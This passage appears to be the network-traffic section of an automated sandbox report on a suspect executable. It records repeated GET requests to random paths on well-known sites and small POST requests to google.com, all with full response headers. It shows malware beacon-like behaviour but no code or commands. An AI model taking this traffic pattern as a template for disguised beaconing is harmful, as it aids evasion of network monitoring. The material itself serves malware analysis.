      Content-Security-Policy: default-src 'self'; connect-src 'self' http://ad.doubleclick.net https://*.analytics.google.com https://*.api.userway.org https://*.clarity.ms https://*.demdex.net https://*.eset.com https://*.googlesyndication.com https://*.hotjar.com https://*.hotjar.io https://*.tt.omtrdc.net https://adservice.google.com https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.go-mpulse.net https://cdn.acsbapp.com https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cookies-data.onetrust.io https://ep.smct.co https://eset.tt.omtrdc.net https://geolocation.onetrust.com https://googleads.g.doubleclick.net https://ipb.smct.co https://ipb.smct.io https://js.smct.co https://js.smct.io https://maps.googleapis.com https://privacyportal.onetrust.com https://px.ads.linkedin.com https://region1.google-analytics.com https://replay.uxtweak.com https://s.yimg.com https://script.crazyegg.com https://smct.co https://stats.g.doubleclick.net https://tracker.clickguard.com https://www.facebook.com https://www.g2.com https://www.google-analytics.com https://www.google.by https://www.google.ch https://www.google.co.uk https://www.google.co.uz https://www.google.com https://www.google.com.tj https://www.google.com.tr https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lt https://www.google.lv https://www.google.pl https://www.google.ru https://www.googletagmanager.com wss://*.hotjar.com; font-src 'self' data: https://cdn.userway.org https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com; frame-src 'self' https://*.fls.doubleclick.net https://8117415.fls.doubleclick.net https://bid.g.doubleclick.net https://download.eset.com https://eset.demdex.net https://hemsync.clickagy.com https://int.form.eset.com https://js.smct.io https://ls.smct.co https://protectdemo.eset.com https://smct.co https://td.doubleclick.net https://tpc.googlesyndication.com https://unity.survey-solutions.cloud https://vars.hotjar.com https://widget.trustpilot.com https://www.facebook.com https://www.google.com https://www.googletagmanager.com https://www.youtube-nocookie.com https://www.youtube.com; img-src 'self' data: http://ad.doubleclick.net https://*.adform.net https://*.ads.linkedin.com https://*.yahoo.co.jp https://ad.doubleclick.net https://ade.googlesyndication.com https://adservice.google.at https://adservice.google.ch https://adservice.google.co.jp https://adservice.google.com https://adservice.google.de https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.bing.com https://c.clarity.ms https://captcha.eset.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.smct.co https://cdn.smct.io https://cdn1.esetstatic.com https://cm.everesttech.net https://cm.g.doubleclick.net https://connect.facebook.net https://dc.ads.linkedin.com https://dpm.demdex.net https://events.smct.co https://googleads.g.doubleclick.net https://i.ytimg.com https://images.g2crowd.com https://maps.googleapis.com https://pagead2.googlesyndication.com https://pubads.g.doubleclick.net https://px.ads.linkedin.com https://region1.analytics.google.com https://region1.google-analytics.com https://script.hotjar.com https://sgtm.eset.com https://ssitecat.eset.com https://ssl.google-analytics.com https://static.hotjar.com https://stats.g.doubleclick.net https://t.co https://tribl.io https://www.facebook.com https://www.google-analytics.com https://www.google.ad https://www.google.ae https://www.google.al https://www.google.am https://www.google.at https://www.google.az https://www.google.ba https://www.google.be https://www.google.bf https://www.google.bg https://www.google.bi https://www.google.bj https://www.google.bs https://www.google.bt https://www.google.by https://www.google.ca https://www.google.cd https://www.google.cf https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.cn https://www.google.co.ao https://www.google.co.bw https://www.google.co.cr https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.kr https://www.google.co.ls https://www.google.co.ma https://www.google.co.mz https://www.google.co.nz https://www.google.co.th https://www.google.co.tz https://www.google.co.ug https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.vi https://www.google.co.za https://www.google.co.zm https://www.google.co.zw https://www.google.com https://www.google.com.af https://www.google.com.ag https://www.google.com.ar https://www.google.com.au https://www.google.com.bd https://www.google.com.bh https://www.google.com.bn https://www.google.com.bo https://www.google.com.br https://www.google.com.bz https://www.google.com.co https://www.google.com.cu https://www.google.com.cy https://www.google.com.do https://www.google.com.ec https://www.google.com.eg https://www.google.com.et https://www.google.com.fj https://www.google.com.gh https://www.google.com.gi https://www.google.com.gt https://www.google.com.hk https://www.google.com.jm https://www.google.com.kh https://www.google.com.kw https://www.google.com.lb https://www.google.com.ly https://www.google.com.mm https://www.google.com.mt https://www.google.com.mx https://www.google.com.my https://www.google.com.na https://www.google.com.ng https://www.google.com.ni https://www.google.com.np https://www.google.com.om https://www.google.com.pa https://www.google.com.pe https://www.google.com.pg https://www.google.com.ph https://www.google.com.pk https://www.google.com.pr https://www.google.com.py https://www.google.com.qa https://www.google.com.sa https://www.google.com.sb https://www.google.com.sg https://www.google.com.sl https://www.google.com.sv https://www.google.com.tj https://www.google.com.tr https://www.google.com.tw https://www.google.com.ua https://www.google.com.uy https://www.google.com.vc https://www.google.com.vn https://www.google.cv https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dk https://www.google.dm https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ga https://www.google.ge https://www.google.gg https://www.google.gl https://www.google.gm https://www.google.gr https://www.google.gy https://www.google.hn https://www.google.hr https://www.google.ht https://www.google.hu https://www.google.ie https://www.google.im https://www.google.iq https://www.google.is https://www.google.it https://www.google.je https://www.google.jo https://www.google.kg https://www.google.ki https://www.google.kz https://www.google.la https://www.google.li https://www.google.lk https://www.google.lt https://www.google.lu https://www.google.lv https://www.google.md https://www.google.me https://www.google.mg https://www.google.mk https://www.google.ml https://www.google.mn https://www.google.mu https://www.google.mv https://www.google.mw https://www.google.ne https://www.google.nl https://www.google.no https://www.google.nr https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.rs https://www.google.ru https://www.google.rw https://www.google.sc https://www.google.se https://www.google.si https://www.google.sk https://www.google.sm https://www.google.sn https://www.google.so https://www.google.sr https://www.google.td https://www.google.tg https://www.google.tl https://www.google.tm https://www.google.tn https://www.google.tt https://www.google.vg https://www.google.vu https://www.googleadservices.com https://www.googletagmanager.com https://www.hotjar.com https://www.linkedin.com; manifest-src 'none'; media-src 'self'; object-src 'self'; prefetch-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://*.replay.uxtweak.com https://*.salesforceliveagent.com https://acsbap.com https://acsbapp.com https://assets.esetstatic.com https://bat.bing.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cdnjs.cloudflare.com https://connect.facebook.net https://d.la1-c2-cdg.salesforceliveagent.com https://embed.tawk.to https://googleads.g.doubleclick.net https://img06.en25.com https://invitejs.trustpilot.com https://js.smct.co https://js.smct.io https://maps.googleapis.com https://nowexttype.com https://pagead2.googlesyndication.com https://platform.twitter.com https://s786665.t.eloqua.com https://script.hotjar.com https://sgtm.eset.com https://smct.co https://snap.licdn.com https://ssl.google-analytics.com https://static.ads-twitter.com https://static.hotjar.com https://store.eset.com https://tpc.googlesyndication.com https://tribl.io https://widget.trustpilot.com https://www.clarity.ms https://www.google-analytics.com https://www.google.ae https://www.google.am https://www.google.at https://www.google.be https://www.google.bg https://www.google.bs https://www.google.by https://www.google.ca https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.ma https://www.google.co.nz https://www.google.co.th https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.za https://www.google.co.zw https://www.google.com https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ge https://www.google.gr https://www.google.hr https://www.google.hu https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lk https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: public, max-age=86400
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Connection: keep-alive
      Set-Cookie: TS01a40e5a=016c9a7a13ffd7ba7d4bca3a5bbaaf12430bb6fd06fabf6d78102aaddf8942faf9e93e233b48d6e25b175daa63b8111b18fcb01008; Path=/; Domain=.eset.com
    • flag-be
      GET
      https://www.eset.com/FMfO1hNIv5/?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.121:443
      Request
      GET /FMfO1hNIv5/?q=0 HTTP/1.1
      Host: www.eset.com
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
      Content-Security-Policy: default-src 'self'; connect-src 'self' http://ad.doubleclick.net https://*.analytics.google.com https://*.api.userway.org https://*.clarity.ms https://*.demdex.net https://*.eset.com https://*.googlesyndication.com https://*.hotjar.com https://*.hotjar.io https://*.tt.omtrdc.net https://adservice.google.com https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.go-mpulse.net https://cdn.acsbapp.com https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cookies-data.onetrust.io https://ep.smct.co https://eset.tt.omtrdc.net https://geolocation.onetrust.com https://googleads.g.doubleclick.net https://ipb.smct.co https://ipb.smct.io https://js.smct.co https://js.smct.io https://maps.googleapis.com https://privacyportal.onetrust.com https://px.ads.linkedin.com https://region1.google-analytics.com https://replay.uxtweak.com https://s.yimg.com https://script.crazyegg.com https://smct.co https://stats.g.doubleclick.net https://tracker.clickguard.com https://www.facebook.com https://www.g2.com https://www.google-analytics.com https://www.google.by https://www.google.ch https://www.google.co.uk https://www.google.co.uz https://www.google.com https://www.google.com.tj https://www.google.com.tr https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lt https://www.google.lv https://www.google.pl https://www.google.ru https://www.googletagmanager.com wss://*.hotjar.com; font-src 'self' data: https://cdn.userway.org https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com; frame-src 'self' https://*.fls.doubleclick.net https://8117415.fls.doubleclick.net https://bid.g.doubleclick.net https://download.eset.com https://eset.demdex.net https://hemsync.clickagy.com https://int.form.eset.com https://js.smct.io https://ls.smct.co https://protectdemo.eset.com https://smct.co https://td.doubleclick.net https://tpc.googlesyndication.com https://unity.survey-solutions.cloud https://vars.hotjar.com https://widget.trustpilot.com https://www.facebook.com https://www.google.com https://www.googletagmanager.com https://www.youtube-nocookie.com https://www.youtube.com; img-src 'self' data: http://ad.doubleclick.net https://*.adform.net https://*.ads.linkedin.com https://*.yahoo.co.jp https://ad.doubleclick.net https://ade.googlesyndication.com https://adservice.google.at https://adservice.google.ch https://adservice.google.co.jp https://adservice.google.com https://adservice.google.de https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.bing.com https://c.clarity.ms https://captcha.eset.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.smct.co https://cdn.smct.io https://cdn1.esetstatic.com https://cm.everesttech.net https://cm.g.doubleclick.net https://connect.facebook.net https://dc.ads.linkedin.com https://dpm.demdex.net https://events.smct.co https://googleads.g.doubleclick.net https://i.ytimg.com https://images.g2crowd.com https://maps.googleapis.com https://pagead2.googlesyndication.com https://pubads.g.doubleclick.net https://px.ads.linkedin.com https://region1.analytics.google.com https://region1.google-analytics.com https://script.hotjar.com https://sgtm.eset.com https://ssitecat.eset.com https://ssl.google-analytics.com https://static.hotjar.com https://stats.g.doubleclick.net https://t.co https://tribl.io https://www.facebook.com https://www.google-analytics.com https://www.google.ad https://www.google.ae https://www.google.al https://www.google.am https://www.google.at https://www.google.az https://www.google.ba https://www.google.be https://www.google.bf https://www.google.bg https://www.google.bi https://www.google.bj https://www.google.bs https://www.google.bt https://www.google.by https://www.google.ca https://www.google.cd https://www.google.cf https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.cn https://www.google.co.ao https://www.google.co.bw https://www.google.co.cr https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.kr https://www.google.co.ls https://www.google.co.ma https://www.google.co.mz https://www.google.co.nz https://www.google.co.th https://www.google.co.tz https://www.google.co.ug https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.vi https://www.google.co.za https://www.google.co.zm https://www.google.co.zw https://www.google.com https://www.google.com.af https://www.google.com.ag https://www.google.com.ar https://www.google.com.au https://www.google.com.bd https://www.google.com.bh https://www.google.com.bn https://www.google.com.bo https://www.google.com.br https://www.google.com.bz https://www.google.com.co https://www.google.com.cu https://www.google.com.cy https://www.google.com.do https://www.google.com.ec https://www.google.com.eg https://www.google.com.et https://www.google.com.fj https://www.google.com.gh https://www.google.com.gi https://www.google.com.gt https://www.google.com.hk https://www.google.com.jm https://www.google.com.kh https://www.google.com.kw https://www.google.com.lb https://www.google.com.ly https://www.google.com.mm https://www.google.com.mt https://www.google.com.mx https://www.google.com.my https://www.google.com.na https://www.google.com.ng https://www.google.com.ni https://www.google.com.np https://www.google.com.om https://www.google.com.pa https://www.google.com.pe https://www.google.com.pg https://www.google.com.ph https://www.google.com.pk https://www.google.com.pr https://www.google.com.py https://www.google.com.qa https://www.google.com.sa https://www.google.com.sb https://www.google.com.sg https://www.google.com.sl https://www.google.com.sv https://www.google.com.tj https://www.google.com.tr https://www.google.com.tw https://www.google.com.ua https://www.google.com.uy https://www.google.com.vc https://www.google.com.vn https://www.google.cv https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dk https://www.google.dm https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ga https://www.google.ge https://www.google.gg https://www.google.gl https://www.google.gm https://www.google.gr https://www.google.gy https://www.google.hn https://www.google.hr https://www.google.ht https://www.google.hu https://www.google.ie https://www.google.im https://www.google.iq https://www.google.is https://www.google.it https://www.google.je https://www.google.jo https://www.google.kg https://www.google.ki https://www.google.kz https://www.google.la https://www.google.li https://www.google.lk https://www.google.lt https://www.google.lu https://www.google.lv https://www.google.md https://www.google.me https://www.google.mg https://www.google.mk https://www.google.ml https://www.google.mn https://www.google.mu https://www.google.mv https://www.google.mw https://www.google.ne https://www.google.nl https://www.google.no https://www.google.nr https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.rs https://www.google.ru https://www.google.rw https://www.google.sc https://www.google.se https://www.google.si https://www.google.sk https://www.google.sm https://www.google.sn https://www.google.so https://www.google.sr https://www.google.td https://www.google.tg https://www.google.tl https://www.google.tm https://www.google.tn https://www.google.tt https://www.google.vg https://www.google.vu https://www.googleadservices.com https://www.googletagmanager.com https://www.hotjar.com https://www.linkedin.com; manifest-src 'none'; media-src 'self'; object-src 'self'; prefetch-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://*.replay.uxtweak.com https://*.salesforceliveagent.com https://acsbap.com https://acsbapp.com https://assets.esetstatic.com https://bat.bing.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cdnjs.cloudflare.com https://connect.facebook.net https://d.la1-c2-cdg.salesforceliveagent.com https://embed.tawk.to https://googleads.g.doubleclick.net https://img06.en25.com https://invitejs.trustpilot.com https://js.smct.co https://js.smct.io https://maps.googleapis.com https://nowexttype.com https://pagead2.googlesyndication.com https://platform.twitter.com https://s786665.t.eloqua.com https://script.hotjar.com https://sgtm.eset.com https://smct.co https://snap.licdn.com https://ssl.google-analytics.com https://static.ads-twitter.com https://static.hotjar.com https://store.eset.com https://tpc.googlesyndication.com https://tribl.io https://widget.trustpilot.com https://www.clarity.ms https://www.google-analytics.com https://www.google.ae https://www.google.am https://www.google.at https://www.google.be https://www.google.bg https://www.google.bs https://www.google.by https://www.google.ca https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.ma https://www.google.co.nz https://www.google.co.th https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.za https://www.google.co.zw https://www.google.com https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ge https://www.google.gr https://www.google.hr https://www.google.hu https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lk https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: max-age=3554
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Connection: Transfer-Encoding
      Set-Cookie: TS01a40e5a=016c9a7a13d2ebe415b465c581718401f12c8beae165b8a1e1a2198863c0032db1693bc35e5de956b78c62d3a0b504e753a1b7202a; Path=/; Domain=.eset.com
    • flag-us
      DNS
      google.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      google.com
      IN A
      Response
      google.com
      IN A
      142.250.200.14
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T022915Z-17585d9fd9cj44z6bkvt57bsaw000000066g000000009mfr
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T022916Z-17585d9fd9cj44z6bkvt57bsaw000000066g000000009mfz
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Connection: close
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Connection: close
    • flag-us
      GET
      https://www.blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.30.98:443
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: www.blockchain.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      content-security-policy: default-src *.blockchain.com; script-src 'self' 'unsafe-eval' https://cdn.polyfill.io https://www.facebook.com http://www.google-analytics.com https://www.google.com https://www.gstatic.com *.blockchain.com *.blockchain.info https://www.googletagmanager.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8 data:; script-src-elem 'self' 'unsafe-inline' https://cdn.polyfill.io http://www.google-analytics.com https://www.googletagmanager.com https://analytics.twitter.com http://static.ads-twitter.com https://connect.facebook.net nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; connect-src 'self' *.blockchain.com *.blockchain.info *.cryptocompare.com https://script.google.com https://webto.salesforce.com/* wss://streamer.cryptocompare.com https://blockchain.info https://api.greenhouse.io *.doubleclick.net *.google.com *.googleusercontent.com https://www.google-analytics.com https://cdn.embedly.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; frame-src 'self' *.blockchain.com *.blockchain.info *.apple.com https://www.google.com https://www.youtube.com https://www.googletagmanager.com https://cdn.embedly.com https://dxmfp9dfv1uwi.cloudfront.net/; img-src 'self' *.blockchain.com *.blockchain.info *.medium.com https://www.googletagmanager.com *.adsrvr.org data: *.cryptocompare.com *.googleusercontent.com https://www.facebook.com http://www.google-analytics.com https://www.google.com http://t.co/i/adsct https://raw.githubusercontent.com *.medium.com; style-src 'self' 'unsafe-inline' https://rsms.me https://fonts.googleapis.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; font-src 'self' https://rsms.me https://fonts.gstatic.com data:; manifest-src 'self'; object-src 'self'; media-src 'self' *.archive.org;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      vary: Accept-Encoding
      x-blockchain-cp-b: blockchain-com
      x-blockchain-cp-f: bm9b 0.001 - 21f4dc4d1d8c733fd82cb011edf6380a
      x-blockchain-language: en
      x-blockchain-language-id: 0:0:0 (en:en:en)
      x-blockchain-server: BlockchainFE/1.0
      x-content-type-options: nosniff
      x-frame-options: SAMEORIGIN
      x-original-host: www.blockchain.com
      x-request-id: 21f4dc4d1d8c733fd82cb011edf6380a
      x-xss-protection: 1; mode=block
      CF-Cache-Status: HIT
      Age: 12
      Set-Cookie: _cfuvid=fAQmeSp4t4vmuPsg2zG4XPCELeYhzM_xKeQt0bt4Pu8-1712716155945-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 871f4ee698349490-LHR
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T022916Z-17585d9fd9cjn5v4s1xh6dd7ps00000002eg00000000cdvs
      X-Cache: CONFIG_NOCACHE
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Connection: close
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Connection: close
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Connection: close
    • flag-gb
      POST
